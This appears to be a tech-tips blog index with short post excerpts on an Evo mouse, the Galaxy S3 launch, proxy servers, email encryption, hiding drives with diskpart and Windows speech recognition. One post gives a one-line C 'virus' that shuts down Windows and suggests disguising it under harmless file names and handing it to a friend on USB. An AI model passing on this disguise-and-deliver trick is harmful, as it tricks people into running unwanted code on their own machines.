Skip to main content

Posts

Future Mouse-Evo Mouse

New evolution of the Mouse. In 1980's round ball mouses are invented, then technology introduced Optical mouses. Now upcoming Mouse is named as Evo mouse . No more movement of your hands on placing a physical mouse,   Your finger is the pointer . You can use this mouse on any Flat Surface and also it requires very little space. This mouse contains a Power button on the top, Mini USb port . It works with the help of bluetooth and input is taken by the sensor. View this Video to know the functionality of   EvoMouse
Recent posts

Samsung Galaxy S3 finally in India

Finally, the wait is over! Samsung galaxy S3 which was launched in Seoul for European and Middle Eastern countries got its Indian debut on Thursday. The much awaited smartphone will cost Rs 43,180 in India. Features of S3 : It will run on : Samsung Galaxy S III runs on Android 4.0 (Ice Cream Sandwich). With a default user interface TouchWiz Nature UX. This samsung’s second phone to come with preloaded Android 4.0 Ice Cream Sandwich after Galaxy Nexus. Display:  It has a 4.8 inch HD Super AMOLED (1280x720) display. Camera:  The phone's 8MP camera features a zero-lag shutter speed that lets user capture moving objects without delay. The 'Burst shot' function allows users to capture twenty continuous shots. HD video can be recorded even with the 1.9MP front facing camera. Memory:  16/ 32GB User memory (64GB available soon), microSD slot (up to 64GB). Smart Stay:  Through this feature, phone tracks your eyes, so as long as you’re looking at it, the displ

Hide your IP address with Proxy servers

The most common method to Hide your IP address is to use a PROXY server. Proxy server is a computer network service that provides an indirect connections between other computer networks. By using this proxy sites we can access any website with out revealing our IP address. This is the best method to keep your IP address secure. Here is the free proxy server website link.  http://www.freeproxyserver.ca/     We need to type the URL of such as (www.facebook.com) in the box given in the site, then we can browse it with out providing our IP address

Send your emails password protected

Now-a-days all are using E-mail for sending the data(such as some files, photos and etc). Sometimes we send private and important mails(such as bank account no's, ATM pin numbers etc), then their is a chance for the hackers to hack your mails. Here is a Free Online E-mail Encryption service LOCKBIN  Lock Bin will protect your mails with SSL and AES-256. SSL-Secure Sockets Layer AES-Advanced Encryption Standard No registration is required to use Lockbin. Your message and file attachments are protected by strong AES-256 bit encryption and your secret password. You invent the password and deliver it to the recipient using a phone, text message, instant message, homing pigeon, but not email. If the recipient clicks the Delete button after viewing the message, it is immediately destroyed. If not manually deleted, then a retrieved message (still encrypted on our server) is automatically deleted within 24 hours. This short delay gives the recipient time to download large

Virus that shutdown your operating system

Simple C program coding , which makes your operating system to shutdown. Write the below given code in Turbo C and save it with the extension .C Open Turbo C and implement the following code void main(void) { system("shutdown -s"); } Let the file name is saved with close.c and compile the program. Now close the turbo c compiler and open the directory in which you have saved the file. Default directory will be c:\tc\bin and double click on its exe file close.exe. Now your operating system will shut down automatically. If you want to fool your friend Then save the file with different names (eg: images.c, books.c etc) , and copy the program in a USB drive then give it to your friend. If he double clicks that file, automatically his system will shutdown

Hide the Hard Disk Drives

Hide your hard disk drives without any software. Here is the procedure to hide all the drives present in your hard disk. This is a security tip which is useful to avoid the unauthorised users to access your data. Follow the steps to hide/unhide your drives : 1. Go to Start > Run > type "diskpart". MS   DOS window will appear with following description. DISKPART> 2)  Then type "list volume" Result will appear like this. 3.suppose if you want to hide the drive E, then type "select volume 3". Then a message will appear on the window "volume 3 is selected". 4. Now type "remove letter E" Now a message will come ( Diskpart Removed the Drive letter ) 5.The process is completed. Sometimes it requires to reboot the system, after the above process. 6.If you want to access the hidden drives then follow the same procedure, but in 4th step replace the "remove" by "assign". It means

Control your computer with your voice commands

You can control your PC by using your voice commands Windows7 has an amazing feature, you can say commands that the computer will respond to, and also you can dictate text to the computer. First of all you need to set up your computer for windows speech recognition. There are three steps to setting up Speech Recognition: set up your microphone, learn how to talk to your computer, and train your computer to understand your speech. Before you get started, make sure that your microphone is connected to your computer . Set up your microphone Open Speech Recognition by clicking the  Start  button  , clicking  Control Panel , clicking  Ease of Access , and then clicking  Speech Recognition . Click  Set up microphone . Follow the instructions on the screen. Note The success of speech recognition is directly related to the quality of the microphone you use. The two most common types of microphones for Speech Recognition are headset microphones and